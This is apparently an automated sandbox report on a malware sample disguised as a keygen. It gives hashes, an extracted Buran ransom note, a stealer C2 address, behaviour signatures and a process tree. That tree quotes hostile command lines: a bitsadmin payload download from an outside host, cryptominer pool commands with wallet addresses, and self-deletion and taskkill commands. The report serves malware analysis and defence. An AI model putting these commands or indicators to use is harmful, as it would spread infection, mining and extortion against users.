Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1801s
  • max time network
    1444s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 09:42

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Your personal ID: 2C9-21A-240 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 50 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1028
    • C:\Users\Admin\AppData\Roaming\evvgigr
      C:\Users\Admin\AppData\Roaming\evvgigr
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:2268
      • C:\Users\Admin\AppData\Roaming\evvgigr
        C:\Users\Admin\AppData\Roaming\evvgigr
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5092
    • C:\Users\Admin\AppData\Roaming\wrvgigr
      C:\Users\Admin\AppData\Roaming\wrvgigr
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5824
    • C:\Users\Admin\AppData\Roaming\evvgigr
      C:\Users\Admin\AppData\Roaming\evvgigr
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:2776
      • C:\Users\Admin\AppData\Roaming\evvgigr
        C:\Users\Admin\AppData\Roaming\evvgigr
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4404
    • C:\Users\Admin\AppData\Roaming\wrvgigr
      C:\Users\Admin\AppData\Roaming\wrvgigr
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5640
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll",uWObqeM
      2⤵
      • Windows security modification
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:5820
    • C:\Users\Admin\AppData\Roaming\evvgigr
      C:\Users\Admin\AppData\Roaming\evvgigr
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:596
      • C:\Users\Admin\AppData\Roaming\evvgigr
        C:\Users\Admin\AppData\Roaming\evvgigr
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5484
    • C:\Users\Admin\AppData\Roaming\wrvgigr
      C:\Users\Admin\AppData\Roaming\wrvgigr
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4568
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2936
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2532
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2484
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1884
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1468
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1392
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1224
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1104
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:60
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:784
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:188
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2384
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:688
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:708
                        • C:\Users\Admin\AppData\Local\Temp\is-5TIE9.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-5TIE9.tmp\Install.tmp" /SL5="$40138,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2300
                          • C:\Users\Admin\AppData\Local\Temp\is-1QMT9.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-1QMT9.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2068
                            • C:\Program Files\MSBuild\QZYOGOJWGU\ultramediaburner.exe
                              "C:\Program Files\MSBuild\QZYOGOJWGU\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2260
                              • C:\Users\Admin\AppData\Local\Temp\is-BASGJ.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-BASGJ.tmp\ultramediaburner.tmp" /SL5="$501EC,281924,62464,C:\Program Files\MSBuild\QZYOGOJWGU\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3392
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2504
                            • C:\Users\Admin\AppData\Local\Temp\da-57385-c4b-3ba82-a333bd440bce5\Pinuvycage.exe
                              "C:\Users\Admin\AppData\Local\Temp\da-57385-c4b-3ba82-a333bd440bce5\Pinuvycage.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1456
                            • C:\Users\Admin\AppData\Local\Temp\61-ddae9-08c-aeeac-fbc58d3b2b959\Jovaezhafola.exe
                              "C:\Users\Admin\AppData\Local\Temp\61-ddae9-08c-aeeac-fbc58d3b2b959\Jovaezhafola.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4124
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\usdqvds1.ggv\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4864
                                • C:\Users\Admin\AppData\Local\Temp\usdqvds1.ggv\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\usdqvds1.ggv\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5004
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ts2fr4h1.cx2\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2924
                                • C:\Users\Admin\AppData\Local\Temp\ts2fr4h1.cx2\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\ts2fr4h1.cx2\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:5180
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                      PID:5324
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aeel4vjb.cjg\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5644
                                    • C:\Users\Admin\AppData\Local\Temp\aeel4vjb.cjg\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\aeel4vjb.cjg\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:6004
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ouwuyx3n.fn2\y1.exe & exit
                                    6⤵
                                      PID:4808
                                      • C:\Users\Admin\AppData\Local\Temp\ouwuyx3n.fn2\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\ouwuyx3n.fn2\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:596
                                        • C:\Users\Admin\AppData\Local\Temp\unyoR2FeBe.exe
                                          "C:\Users\Admin\AppData\Local\Temp\unyoR2FeBe.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5364
                                          • C:\Users\Admin\AppData\Roaming\1619351271168.exe
                                            "C:\Users\Admin\AppData\Roaming\1619351271168.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619351271168.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:4040
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\unyoR2FeBe.exe"
                                            9⤵
                                              PID:2236
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:5300
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ouwuyx3n.fn2\y1.exe"
                                            8⤵
                                              PID:5820
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:3532
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yi3jkq2s.uyl\askinstall39.exe & exit
                                          6⤵
                                            PID:2740
                                            • C:\Users\Admin\AppData\Local\Temp\yi3jkq2s.uyl\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\yi3jkq2s.uyl\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5536
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:5116
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:4468
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbkx0quu.op0\inst.exe & exit
                                            6⤵
                                              PID:5340
                                              • C:\Users\Admin\AppData\Local\Temp\tbkx0quu.op0\inst.exe
                                                C:\Users\Admin\AppData\Local\Temp\tbkx0quu.op0\inst.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2776
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hxz3h4mw.q3b\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:1204
                                                • C:\Users\Admin\AppData\Local\Temp\hxz3h4mw.q3b\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\hxz3h4mw.q3b\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:4804
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:5840
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2464
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5476
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5904
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                                PID:4808
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5588
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5972
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:5732
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:4116
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5360
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:4036
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4472
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:3064
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6032
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:3024
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                              PID:5016
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4084
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              PID:5948
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                                9⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                PID:1816
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5776
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4952
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4884
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5936
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5916
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssF2C4.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4268
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:2324
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5stoutdq.0sa\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5516
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vmkxiwf.he1\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:5248
                                                                                        • C:\Users\Admin\AppData\Local\Temp\3vmkxiwf.he1\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\3vmkxiwf.he1\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4264
                                                                                          • C:\Users\Admin\AppData\Local\Temp\3vmkxiwf.he1\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\3vmkxiwf.he1\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4340
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bigcfuqb.nbb\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:4224
                                                                                          • C:\Users\Admin\AppData\Local\Temp\bigcfuqb.nbb\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\bigcfuqb.nbb\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5260
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wzrasjze.m1g\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:5732
                                                                                            • C:\Users\Admin\AppData\Local\Temp\wzrasjze.m1g\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\wzrasjze.m1g\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5360
                                                                                              • C:\Users\Admin\AppData\Local\Temp\wzrasjze.m1g\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\wzrasjze.m1g\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5532
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4220
                                                                                    • C:\Users\Admin\AppData\Roaming\B2DB.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\B2DB.tmp.exe"
                                                                                      3⤵
                                                                                        PID:5116
                                                                                        • C:\Users\Admin\AppData\Roaming\B2DB.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\B2DB.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:5628
                                                                                      • C:\Users\Admin\AppData\Roaming\B7FC.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\B7FC.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:3708
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w19924@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:5920
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w11043 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:6132
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:5608
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
